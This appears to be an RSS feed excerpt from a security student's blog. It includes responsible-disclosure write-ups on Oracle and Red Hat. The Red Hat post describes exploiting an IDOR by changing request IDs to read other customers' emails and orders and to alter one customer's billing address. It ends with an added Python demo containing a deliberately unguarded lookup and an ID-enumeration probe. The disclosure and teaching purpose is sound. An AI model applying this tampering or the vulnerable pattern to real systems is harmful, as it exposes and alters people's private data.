Find more about this at <a href="https://octavis.io/charitable-organisations/">Charity</a>.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/06/together-we-create.jpg" class="kg-image" alt="Octavis.io - We have officially launched!" loading="lazy" width="1920" height="1080" srcset="https://flaviu.io/content/images/size/w600/2021/06/together-we-create.jpg 600w, https://flaviu.io/content/images/size/w1000/2021/06/together-we-create.jpg 1000w, https://flaviu.io/content/images/size/w1600/2021/06/together-we-create.jpg 1600w, https://flaviu.io/content/images/2021/06/together-we-create.jpg 1920w" sizes="(min-width: 720px) 720px"><figcaption>Together WE Create!</figcaption></figure><p>Starting a business has proved to have its ups and downs. It has so far had more ups. It has been great learning a whole host of new skills and meeting potential clients, as we did not see it attracting attention so soon. </p><p>Interested in any of our services? Find us at <a href="https://octavis.io/">Octavis.io</a>, book a meeting and choose a day and time that suits you.<br></p><p>We cannot wait to see where the business takes us, and it will be interesting to see what happens when we add Cyber Security services. If you made it this far, thank you very much! Have you got any feedback for us? &#xA0;hello[at]octavis.io</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/06/to-be-continued.jpg" class="kg-image" alt="Octavis.io - We have officially launched!" 
loading="lazy" width="1920" height="1280" srcset="https://flaviu.io/content/images/size/w600/2021/06/to-be-continued.jpg 600w, https://flaviu.io/content/images/size/w1000/2021/06/to-be-continued.jpg 1000w, https://flaviu.io/content/images/size/w1600/2021/06/to-be-continued.jpg 1600w, https://flaviu.io/content/images/2021/06/to-be-continued.jpg 1920w" sizes="(min-width: 720px) 720px"><figcaption>To Be Continued!</figcaption></figure>]]></content:encoded></item><item><title><![CDATA[GCU's Student News Page]]></title><description><![CDATA[GCU's student news got in touch with me after reading the article I had written about Red Hat. I am pleased to say that I have been featured on my University's Student News page due to the vulnerability disclosure.]]></description><link>https://flaviu.io/gcu-student-news-cyber-security/</link><guid isPermaLink="false">601152c21679673a38c4c100</guid><category><![CDATA[cybersecurity]]></category><dc:creator><![CDATA[Flaviu Popescu]]></dc:creator><pubDate>Wed, 27 Jan 2021 12:39:26 GMT</pubDate><media:content url="https://flaviu.io/content/images/2021/02/flav-new.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://flaviu.io/content/images/2021/02/flav-new.jpg" alt="GCU&apos;s Student News Page"><p></p><p>GCU&apos;s student news got in touch with me after reading the article I had written about Red Hat. I am pleased to say that I have been featured on my University&apos;s Student News page due to the vulnerability disclosure. 
&#x1F92F;</p><hr><figure class="kg-card kg-bookmark-card kg-card-hascaption"><a class="kg-bookmark-container" href="https://www.gcu.ac.uk/student/news/studentnewsredhatwebsite/"><div class="kg-bookmark-content"><div class="kg-bookmark-title">GCU Ethical Hacking student identifies major website flaws for massive software company | GCU</div><div class="kg-bookmark-description">A GCU Ethical Hacking student has impressed a large software company for using their skills to fix some significant errors found on their website.</div><div class="kg-bookmark-metadata"><span class="kg-bookmark-author">GCU</span><span class="kg-bookmark-publisher">digitalteamgcu.ac.uk</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://www.gcu.ac.uk/student/news/studentnewsredhatwebsite/900x440%20red%20hat.jpg" alt="GCU&apos;s Student News Page"></div></a><figcaption>GCU Student News Page</figcaption></figure><hr><p>It pays off to be curious, explore and push boundaries.</p><p>It&apos;s exciting and eye opening how my journey has been over the last year.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/01/journey.jpg" class="kg-image" alt="GCU&apos;s Student News Page" loading="lazy" width="1920" height="1078" srcset="https://flaviu.io/content/images/size/w600/2021/01/journey.jpg 600w, https://flaviu.io/content/images/size/w1000/2021/01/journey.jpg 1000w, https://flaviu.io/content/images/size/w1600/2021/01/journey.jpg 1600w, https://flaviu.io/content/images/2021/01/journey.jpg 1920w" sizes="(min-width: 720px) 720px"><figcaption>journey</figcaption></figure><p>&quot;I love what I&apos;m doing and will continue to do it, and there&apos;s nothing you can do to stop me.&quot;</p><hr><p>Thanks everyone for the continuous motivation, love and support. 
It really means a lot.<br></p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/01/dosomethingreat.jpg" class="kg-image" alt="GCU&apos;s Student News Page" loading="lazy" width="1920" height="1280" srcset="https://flaviu.io/content/images/size/w600/2021/01/dosomethingreat.jpg 600w, https://flaviu.io/content/images/size/w1000/2021/01/dosomethingreat.jpg 1000w, https://flaviu.io/content/images/size/w1600/2021/01/dosomethingreat.jpg 1600w, https://flaviu.io/content/images/2021/01/dosomethingreat.jpg 1920w" sizes="(min-width: 720px) 720px"><figcaption>&quot;Surround yourself with positive people.&quot;</figcaption></figure><hr><!--kg-card-begin: markdown--><p>Have you got any suggestions or questions for me? <a href="mailto:hello@flaviu.io">Get in touch!</a></p>
<p>Thank you for reading my article. Until next time!</p>
<p>Your friendly neighbourhood <mark>Hacker.</mark></p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[I come in peace!]]></title><description><![CDATA[This is the type of issue that would benefit someone with malicious intent and little know-how; this was concerning to me because the banking company currently processes 130 billion in payments annually for its clients, which include banks, card entities, and payment.]]></description><link>https://flaviu.io/oracle-vulnerability-disclosure/</link><guid isPermaLink="false">5f972e8b1679673a38c4b745</guid><category><![CDATA[cybersecurity]]></category><category><![CDATA[hacking]]></category><category><![CDATA[linux]]></category><category><![CDATA[offensivesecurity]]></category><category><![CDATA[bugbounty]]></category><dc:creator><![CDATA[Flaviu Popescu]]></dc:creator><pubDate>Mon, 25 Jan 2021 11:17:36 GMT</pubDate><media:content url="https://flaviu.io/content/images/2021/01/Oracle-Logox.png" medium="image"/><content:encoded><![CDATA[<img src="https://flaviu.io/content/images/2021/01/Oracle-Logox.png" alt="I come in peace!"><p>I hope everyone is safe and well! I have not been active on the blog recently. It&apos;s time for an update on what I&apos;ve been doing.</p><p>Today I am writing a short article on my disclosure to Oracle.</p><hr><p>Casual day, browsing the internet, looking for my next victim (joke!), when a page that belonged to Oracle had an error that caught my attention. 
I decided to have a look into it, mainly because of the domain name where the error occurred: it was a bank that provides financial infrastructure to deliver a range of B2B banking solutions and services, enabling businesses to trade globally.</p><p>They are using digitally disruptive technology that frees them from the legacy systems that make those traditional banks slow and expensive.</p><p>After doing some white magic (DNS level) and taking over the bank&apos;s domain, which would also result in taking over Oracle&apos;s domain, essentially owning 2 high-authority domains in one go.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/01/magic.png" class="kg-image" alt="I come in peace!" loading="lazy" width="997" height="834" srcset="https://flaviu.io/content/images/size/w600/2021/01/magic.png 600w, https://flaviu.io/content/images/2021/01/magic.png 997w" sizes="(min-width: 720px) 720px"><figcaption>wizard, spell book</figcaption></figure><p>This is the type of issue that would benefit someone with malicious intent and little know-how; this was concerning to me because the banking company currently processes 130 billion in payments annually for its clients, which include banks, card entities, and payment gateways that choose. It also has partnerships with several other banks to provide direct clearing access, making the payments faster and cheaper.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/01/darkwizzard.jpg" class="kg-image" alt="I come in peace!" loading="lazy" width="800" height="551" srcset="https://flaviu.io/content/images/size/w600/2021/01/darkwizzard.jpg 600w, https://flaviu.io/content/images/2021/01/darkwizzard.jpg 800w" sizes="(min-width: 720px) 720px"><figcaption>Dark Wizard</figcaption></figure><p>Because I found this through Oracle, it was time to send them an e-mail and point out my concern. 
Oracle&apos;s security team was prompt, fixed the issue that lay on their end and informed the 3rd party as well.</p><p>A few weeks go by and I receive an e-mail to say that I will be given credit in the upcoming Critical Patch Update, due to be released at 1:00 PM, U.S. Pacific Time, on January 19, 2021.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/01/image-4.png" class="kg-image" alt="I come in peace!" loading="lazy" width="1895" height="805" srcset="https://flaviu.io/content/images/size/w600/2021/01/image-4.png 600w, https://flaviu.io/content/images/size/w1000/2021/01/image-4.png 1000w, https://flaviu.io/content/images/size/w1600/2021/01/image-4.png 1600w, https://flaviu.io/content/images/2021/01/image-4.png 1895w" sizes="(min-width: 720px) 720px"><figcaption>Oracle Online Presence Security Contributor</figcaption></figure><figure class="kg-card kg-bookmark-card kg-card-hascaption"><a class="kg-bookmark-container" href="https://www.oracle.com/security-alerts/cpujan2021.html"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Oracle Critical Patch Update Advisory - January 2021</div><div class="kg-bookmark-description"></div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://www.oracle.com/asset/web/favicons/favicon-192.png" alt="I come in peace!"><span class="kg-bookmark-author">January 2021</span></div></div></a><figcaption>Oracle Critical Patch Update January 2021</figcaption></figure><hr><p>For ~2 months, it looks like I&apos;ve been absent from my blog and my usual hobbies, Hack The Box, CTFs and so on. 
I had to put my priorities first: my University assessments, which were quite odd due to this year&apos;s being delivered digitally.</p><p>Unfortunately, there are only so many hours in a day and my time is already so limited, as my kids are growing they require more and more of my attention.</p><p>Despite all this, I have been doing lots of cool stuff and I have many stories like this one to talk about! At the moment Hack The Box is on pause, CTFs are on pause and looking for bugs is on pause as well. This is because I&apos;ve committed to a <strong>bigger project! Stay tuned</strong> to find out more.</p><!--kg-card-begin: markdown--><p>Have you got any suggestions or questions for me? <a href="mailto:hello@flaviu.io">Get in touch!</a></p>
<p>Thank you for reading my article. Until next time!</p>
<p>Your friendly neighbourhood <mark>Hacker.</mark></p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[Don't ask me to do a darn thing, I'm RED HATTING]]></title><description><![CDATA[Sometimes in life we hear facts, facts that shock us. These facts can be along the lines of "Did you know all the plastic ever manufactured is still on the planet?" Shocking, isn't it? Another fact that seems to shock even the most tech savvy, is that...]]></description><link>https://flaviu.io/red-hat-vulnerability-disclosure/</link><guid isPermaLink="false">5fb566671679673a38c4bad0</guid><category><![CDATA[cybersecurity]]></category><category><![CDATA[hacking]]></category><dc:creator><![CDATA[Flaviu Popescu]]></dc:creator><pubDate>Mon, 23 Nov 2020 18:39:40 GMT</pubDate><media:content url="https://flaviu.io/content/images/2020/11/screenfetch-rhel-8-2.png" medium="image"/><content:encoded><![CDATA[<hr><img src="https://flaviu.io/content/images/2020/11/screenfetch-rhel-8-2.png" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING"><p>Sometimes in life, we hear facts, facts that shock us. These facts can be along the lines of &quot;Did you know all the plastic ever manufactured is still on the planet?&quot; Shocking, isn&apos;t it? Another fact that seems to shock even the most tech-savvy is that there are on average 84,500 attempted cyber-attacks per day on small businesses within the UK (<a href="https://www.hiscoxgroup.com/news/press-releases/2018/18-10-18">Hiscox</a>, <a href="https://www.hiscox.co.uk/business-insurance/cyber-and-data-insurance/faq/small-business-guide-to-cyber-attacks">Hiscox</a>). The average cost of a cyber security breach for a small business in 2019 was &#xA3;11,000 (<a href="https://www.gov.uk/government/statistics/cyber-security-breaches-survey-2019">Official Gov.uk Cyber Security Breaches Survey 2019</a>).</p><p>Now that is shocking. 
However, most breaches are minor and do not cause much damage or inconvenience, but what happens when the breach is not so small and could cause the company lots of damage? What if these breaches reveal personal information about consumers and their orders?</p><p>Let&apos;s look at a couple of examples.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/11/image-4.png" class="kg-image" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING" loading="lazy" width="714" height="402" srcset="https://flaviu.io/content/images/size/w600/2020/11/image-4.png 600w, https://flaviu.io/content/images/2020/11/image-4.png 714w"><figcaption>TOP 5 BIGGEST GDPR FINES</figcaption></figure><p>A couple more to jog your memory: remember the infamous Cambridge Analytica scandal? This compromised the data of 87 million users.</p><p>How about a recent settlement? The Information Commissioner&#x2019;s Office has <a href="https://ico.org.uk/action-weve-taken/enforcement/ticketmaster-uk-limited/">fined Ticketmaster UK Limited &#xA3;1.25million for failing to keep its customers&#x2019; personal data secure</a>.</p><p>Ok, enough with the stats!</p><hr><p> An imminent breach was discovered by me and this is how it happened.</p><p><em>Before we move on please see /</em><a href="https://flaviu.io/disclaimer/"><em>disclaimer</em></a><em>/</em></p><p>It all started on a sunny day shortly after I received the e-mail pictured below. I assumed this was due to having just enrolled in <a href="https://www.redhat.com/en/services/training/red-hat-academy">RedHat Academy</a> as a requirement for one of my modules at <a href="https://www.gcu.ac.uk/">University</a>.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/11/image-3.png" class="kg-image" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING" loading="lazy" width="1177" height="805" 
srcset="https://flaviu.io/content/images/size/w600/2020/11/image-3.png 600w, https://flaviu.io/content/images/size/w1000/2020/11/image-3.png 1000w, https://flaviu.io/content/images/2020/11/image-3.png 1177w" sizes="(min-width: 720px) 720px"><figcaption>RedHat Email</figcaption></figure><p>As we can see, nothing bad in here, thanks for being chosen for this RedHat!<br></p><p>Opening the underlined hyperlink takes me to a training portal, which does its authentication through their SSO (Single Sign-On).<br>&#x200C;</p><figure class="kg-card kg-gallery-card kg-width-wide kg-card-hascaption"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2020/11/image-9-1.png" width="1910" height="934" loading="lazy" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING" srcset="https://flaviu.io/content/images/size/w600/2020/11/image-9-1.png 600w, https://flaviu.io/content/images/size/w1000/2020/11/image-9-1.png 1000w, https://flaviu.io/content/images/size/w1600/2020/11/image-9-1.png 1600w, https://flaviu.io/content/images/2020/11/image-9-1.png 1910w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2020/11/image-10-1.png" width="1095" height="576" loading="lazy" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING" srcset="https://flaviu.io/content/images/size/w600/2020/11/image-10-1.png 600w, https://flaviu.io/content/images/size/w1000/2020/11/image-10-1.png 1000w, https://flaviu.io/content/images/2020/11/image-10-1.png 1095w" sizes="(min-width: 720px) 720px"></div></div></div><figcaption>RedHat SSO portal</figcaption></figure><p>I log in with my RedHat account and browse about the website, the portal can be seen below.</p><p>Nothing out of the ordinary here, I was purely just looking to see what&apos;s in it for me.<br></p><p>I head to my profile and find a section where it showed me the e-mail I had just 
received.</p><p>This is what caught my attention. This is just a coincidence o_O</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/11/redhat1.gif" class="kg-image" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING" loading="lazy" width="869" height="600"><figcaption>RedHat Email</figcaption></figure><p>You know what I&apos;m thinking, right? Allowed to see the source code, resend button.. hmm! Bug Hunter mode ON! But wait wait wait, do they have a policy?</p><ul><li>I had no vulnerability found at this stage but I needed to know that I am allowed to proceed.</li></ul><p>Turns out RedHat does have a Vulnerability Disclosure Program, but not a Bug Bounty program [..] a quick Google search found a link on <a href="https://hackerone.com/redhat?type=team">HackerOne</a>.</p><p>At this stage, it was apparent to me that if I decided to go ahead and try to find something I was not going to get any monetary rewards. I&apos;m cool with that; as I previously mentioned in my other articles, I&apos;m in for the learning experience and if I can add any value, why not.</p><p>Coming back to the source code of the e-mail: by allowing anyone to see this, it becomes so much easier to grab the HTML code and use it for spear phishing attacks. Then I wondered, what is the purpose of this resend button?</p><p>Time to summon the interceptor God, I&apos;m talking about <a href="https://portswigger.net/burp">Burp Suite</a>! Big congrats to the <a href="https://portswigger.net/">Portswigger</a> Team for building such a fantastic application security testing software.</p><p>So at this stage, I just want to see what the requests look like, what parameters there are when I interact with the portal, what happens when I click resend etc.</p><p>My initial attack vector was simply to see if I could edit the source code, place my own website as the hyperlink and resend it to myself. 
If I could do that successfully then I would build from there onwards.</p><p>I spent some time trying to achieve this but I couldn&apos;t. I tried to blame it on my inexperience, however based on what I could see within the requests I started to realize that the template of the e-mail is loaded from within the app and I cannot modify these templates or add my own.</p><p>Ok dammit.. nothing yet.. Time to enumerate more!</p><p>A couple of interesting parameters I noticed were sessionId=&quot;abc1234&quot; and emaId=&quot;1234&quot; (examples)</p><p>So what really happens if I capture a request when I ask the application to show me the contents of my email (with my own emailId) but then change that value to see if I can access other emails&apos; correspondence?</p><p>Yep, we&apos;re talking about an IDOR (Insecure Direct Object Reference).</p><h3 id="what-is-an-idor-vulnerability"><strong>What is an IDOR vulnerability?</strong></h3><p>An application can carry many object identifiers such as &quot;id&quot;, &quot;pid&quot;, &quot;uid&quot; etc. Although these values are most often seen as HTTP parameters, they can also be found in headers and cookies. When the server uses such a value to look up an object without checking that the logged-in user is authorised to access it, an attacker can access, edit or delete other users&#x2019; objects simply by changing the value. This vulnerability is called IDOR.</p><p>To find it, one first needs to understand the application flow as the software developers built it: every module&apos;s functions and their sub-modules&apos; functions need to be understood from the perspective of a user logged into the web/mobile application. 
It is also important to remember that this vulnerability can be as severe as XSS or CSRF, yet it is a type of vulnerability that is not easily discovered, whether by automated or manual testing.</p><p>The IDOR vulnerability is illustrated in the following image between user and server.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/11/image-13.png" class="kg-image" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING" loading="lazy" width="1600" height="995" srcset="https://flaviu.io/content/images/size/w600/2020/11/image-13.png 600w, https://flaviu.io/content/images/size/w1000/2020/11/image-13.png 1000w, https://flaviu.io/content/images/2020/11/image-13.png 1600w" sizes="(min-width: 720px) 720px"><figcaption>IDOR vulnerability</figcaption></figure><hr><p>Okay, changed the values, sent the request... I get this:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/11/image-14.png" class="kg-image" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING" loading="lazy" width="874" height="577" srcset="https://flaviu.io/content/images/size/w600/2020/11/image-14.png 600w, https://flaviu.io/content/images/2020/11/image-14.png 874w" sizes="(min-width: 720px) 720px"><figcaption>RedHat Email</figcaption></figure><p>Wow.. 
so now I see this customer&apos;s email and can download their attachments; checking the source code of that email reveals no private information about this customer besides their full name.<br>Each customer had an inbox, so every time I would pick a different emailId I&apos;d get a different inbox. I played around with this for a while, trying to increase the severity of this bug; the contents were all similar, but some were revealing significantly more information (payment related).</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/11/image-15.png" class="kg-image" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING" loading="lazy" width="1088" height="608" srcset="https://flaviu.io/content/images/size/w600/2020/11/image-15.png 600w, https://flaviu.io/content/images/size/w1000/2020/11/image-15.png 1000w, https://flaviu.io/content/images/2020/11/image-15.png 1088w" sizes="(min-width: 720px) 720px"><figcaption>Email Content RedHat</figcaption></figure><p>Moving on, what else is possible to access besides these emails?</p><p><br>I noticed the tab &quot;My Orders&quot; so I clicked there.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/11/image-16.png" class="kg-image" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING" loading="lazy" width="1124" height="533" srcset="https://flaviu.io/content/images/size/w600/2020/11/image-16.png 600w, https://flaviu.io/content/images/size/w1000/2020/11/image-16.png 1000w, https://flaviu.io/content/images/2020/11/image-16.png 1124w" sizes="(min-width: 720px) 720px"><figcaption>My Orders RedHat</figcaption></figure><p>Of course, I didn&apos;t have any orders, so trying to search for product names like &quot;red hat certification&quot; or some unknown order number revealed no entries found.</p><p><br>I decided to capture a blank request on the Search button to see what parameters are there.</p><figure 
class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/11/image-17.png" class="kg-image" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING" loading="lazy" width="1345" height="51" srcset="https://flaviu.io/content/images/size/w600/2020/11/image-17.png 600w, https://flaviu.io/content/images/size/w1000/2020/11/image-17.png 1000w, https://flaviu.io/content/images/2020/11/image-17.png 1345w" sizes="(min-width: 720px) 720px"><figcaption>Request RedHat Burp</figcaption></figure><p>So we can see in_param2=&quot; &quot;. Playing with this value, on my first try I managed to find a result.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/11/image-18.png" class="kg-image" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING" loading="lazy" width="1127" height="528" srcset="https://flaviu.io/content/images/size/w600/2020/11/image-18.png 600w, https://flaviu.io/content/images/size/w1000/2020/11/image-18.png 1000w, https://flaviu.io/content/images/2020/11/image-18.png 1127w" sizes="(min-width: 720px) 720px"><figcaption>Order RedHat</figcaption></figure><p>Perfect! 
Now capturing the next request will give me a better idea of how this request looks when opening the order tab.</p><figure class="kg-card kg-gallery-card kg-width-wide kg-card-hascaption"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2020/11/2020-11-23-13_10_54-Clipboard.png" width="1102" height="600" loading="lazy" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING" srcset="https://flaviu.io/content/images/size/w600/2020/11/2020-11-23-13_10_54-Clipboard.png 600w, https://flaviu.io/content/images/size/w1000/2020/11/2020-11-23-13_10_54-Clipboard.png 1000w, https://flaviu.io/content/images/2020/11/2020-11-23-13_10_54-Clipboard.png 1102w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2020/11/2020-11-23-13_13_30-Clipboard1.png" width="1107" height="453" loading="lazy" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING" srcset="https://flaviu.io/content/images/size/w600/2020/11/2020-11-23-13_13_30-Clipboard1.png 600w, https://flaviu.io/content/images/size/w1000/2020/11/2020-11-23-13_13_30-Clipboard1.png 1000w, https://flaviu.io/content/images/2020/11/2020-11-23-13_13_30-Clipboard1.png 1107w" sizes="(min-width: 720px) 720px"></div></div></div><figcaption>Order RedHat</figcaption></figure><p>Ok, as you can see, this allows me to see this particular customer, whose order I found by playing with the in_param2 value. I can Print Order, View Transaction Details, Cancel/Refund Order, Change billing address, View Full Details.</p><p><br>I decided straight from the beginning that I would not try the Cancel/Refund order function, but I did try &quot;changing the billing address&quot;.</p><p><br>As seen below, I was able to add a new billing address and set it as default. 
I noticed I wasn&apos;t able to remove this address so I left notes for RedHat if they wanted to fix it themselves (I have restored the default billing address).</p><figure class="kg-card kg-gallery-card kg-width-wide kg-card-hascaption"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2020/11/2020-11-23-13_26_53-Clipboard3-1.png" width="1110" height="596" loading="lazy" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING" srcset="https://flaviu.io/content/images/size/w600/2020/11/2020-11-23-13_26_53-Clipboard3-1.png 600w, https://flaviu.io/content/images/size/w1000/2020/11/2020-11-23-13_26_53-Clipboard3-1.png 1000w, https://flaviu.io/content/images/2020/11/2020-11-23-13_26_53-Clipboard3-1.png 1110w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2020/11/2020-11-23-13_28_16-Clipboard4.png" width="1124" height="587" loading="lazy" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING" srcset="https://flaviu.io/content/images/size/w600/2020/11/2020-11-23-13_28_16-Clipboard4.png 600w, https://flaviu.io/content/images/size/w1000/2020/11/2020-11-23-13_28_16-Clipboard4.png 1000w, https://flaviu.io/content/images/2020/11/2020-11-23-13_28_16-Clipboard4.png 1124w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2020/11/2020-11-23-13_28_16-Clipboard5.png" width="1448" height="599" loading="lazy" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING" srcset="https://flaviu.io/content/images/size/w600/2020/11/2020-11-23-13_28_16-Clipboard5.png 600w, https://flaviu.io/content/images/size/w1000/2020/11/2020-11-23-13_28_16-Clipboard5.png 1000w, https://flaviu.io/content/images/2020/11/2020-11-23-13_28_16-Clipboard5.png 1448w" sizes="(min-width: 720px) 720px"></div></div></div><figcaption>From Left to Right (Changing billing address) 
RedHat</figcaption></figure><hr><p>I tried to find other customers&apos; orders without changing any of their billing details and, as expected, I was able to find more customers. The purpose of this was to show RedHat that I could see more than just one customer&apos;s details.</p><p><br>I stopped there; one can assume that if this function worked, then I could cancel/refund the order as well.</p><p><br>I got in touch with the RedHat Security Team, sent them a detailed report with a step-by-step procedure to reproduce all of the above, and recorded it in a Proof of Concept video to make it easier for them to identify exactly where and how I found these issues.</p><p><br>[sending null payloads...]</p><p><br>I know my article has many screenshots, and a few are obfuscated for obvious reasons. I would love to add the proof of concept video, but I agreed with RedHat not to disclose personally identifiable information about their customer base.</p><p><br>Timeline (dates are dd/mm/yyyy, times are 24-hour):</p><figure class="kg-card kg-code-card"><pre><code class="language-ascii">Congratulations Email            [Received]  Wed 07/10/2020 08:17
Vulnerability Disclosure Report  [Sent]      Mon 12/10/2020 15:22
Acknowledgement of the Report    [Received]  Thu 15/10/2020 09:06
Needs more info from RedHat      [Received]  Mon 19/10/2020 14:07
More info                        [Sent]      Mon 19/10/2020 14:16
PoC validated by RedHat          [Received]  Tue 20/10/2020 16:15
Issues remediated                [Received]  Mon 16/11/2020 22:56
Added to Hall of Fame            [Received]  Tue 17/11/2020 09:26</code></pre><figcaption>Timeline</figcaption></figure><hr><figure class="kg-card kg-bookmark-card kg-card-hascaption"><a class="kg-bookmark-container" href="https://access.redhat.com/articles/66234"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Vulnerability Acknowledgements for Red Hat online services - Red Hat Customer Portal</div><div class="kg-bookmark-description">Vulnerability Acknowledgements for Red Hat online services.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://access.redhat.com/webassets/avalon/g/favicon.ico" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING"><span class="kg-bookmark-author">Red Hat Customer Portal</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://access.redhat.com/webassets/avalon/g/shadowman-200.png" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING"></div></a><figcaption>Hall Of Fame RedHat</figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/11/image-20.png" class="kg-image" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING" loading="lazy" width="1633" height="856" srcset="https://flaviu.io/content/images/size/w600/2020/11/image-20.png 600w, https://flaviu.io/content/images/size/w1000/2020/11/image-20.png 1000w, https://flaviu.io/content/images/size/w1600/2020/11/image-20.png 1600w, https://flaviu.io/content/images/2020/11/image-20.png 1633w" sizes="(min-width: 720px) 720px"><figcaption>Hall Of Fame RedHat</figcaption></figure><!--kg-card-begin: markdown--><p>Have you got any suggestions or questions for me? <a href="mailto:hello@flaviu.io">Get in touch!</a></p>
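<p>To make the security point of this write-up concrete, here is an added example that is not from the original article and is not Red Hat&apos;s code: a mock order lookup that, like the order tab above, returns whatever record <code>in_param2</code> points at, beside a hardened version that enforces object-level authorization, plus the enumeration check a tester runs against both. Only the parameter name <code>in_param2</code> comes from the write-up; the data model, the account names and the helper names are assumptions made for this example.</p>

```python
"""Object-level authorization (IDOR) demo: a vulnerable order lookup beside
its hardened form.  Illustrative code added for this write-up; it is not
Red Hat's code.  Only the parameter name in_param2 comes from the article;
the data model, accounts and helper names are assumptions."""
from dataclasses import dataclass
from typing import Callable, Iterable, List, Optional


@dataclass(frozen=True)
class Order:
    order_id: int      # the value the order tab sends as in_param2
    owner: str         # customer account the order belongs to
    total: str
    billing_address: str


# Constructed sample data standing in for the order database.
ORDERS = {
    1001: Order(1001, "alice@example.test", "1299.00 USD", "1 Main St"),
    1002: Order(1002, "bob@example.test", "499.00 USD", "2 Side Rd"),
    1003: Order(1003, "carol@example.test", "89.00 USD", "3 Back Ln"),
}


class Forbidden(Exception):
    """Raised when the caller may not see the requested object."""


def get_order_vulnerable(session_user: str, in_param2: int) -> Optional[Order]:
    """Vulnerable: the session is authenticated, but nothing ties the order
    referenced by in_param2 to session_user, so any logged-in customer can
    read any order simply by changing the number."""
    return ORDERS.get(in_param2)


def get_order_hardened(session_user: str, in_param2: int) -> Order:
    """Hardened: fetch the object, then enforce ownership server-side.
    'Missing' and 'not yours' produce the same error so the endpoint cannot
    be used to enumerate which order IDs exist."""
    order = ORDERS.get(in_param2)
    if order is None or order.owner != session_user:
        raise Forbidden("order not found")
    return order


def can_access(session_user: str, in_param2: int) -> bool:
    """Convenience wrapper: True only if the hardened lookup succeeds."""
    try:
        get_order_hardened(session_user, in_param2)
        return True
    except Forbidden:
        return False


def probe_idor(lookup: Callable[[str, int], Optional[Order]],
               session_user: str, candidate_ids: Iterable[int]) -> List[int]:
    """Tester's check: holding one customer's session, try a range of
    in_param2 values and return the IDs that came back belonging to
    someone else.  An empty list means ownership is enforced."""
    leaked = []
    for oid in candidate_ids:
        try:
            order = lookup(session_user, oid)
        except Forbidden:
            continue
        if order is not None and order.owner != session_user:
            leaked.append(oid)
    return leaked


if __name__ == "__main__":
    me = "alice@example.test"
    print("vulnerable leaks:", probe_idor(get_order_vulnerable, me, range(1000, 1010)))
    print("hardened leaks:  ", probe_idor(get_order_hardened, me, range(1000, 1010)))
```

<p>The hardened lookup answers &quot;not yours&quot; and &quot;does not exist&quot; identically, so the endpoint cannot be used to confirm which order IDs are valid. The same ownership check belongs in front of every write on the order, such as the billing-address change and the cancel/refund action, not only in front of the read.</p>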
<p>Thank you for reading my article. Until next time!</p>
<p>Your friendly neighbourhood <mark>Hacker.</mark></p>
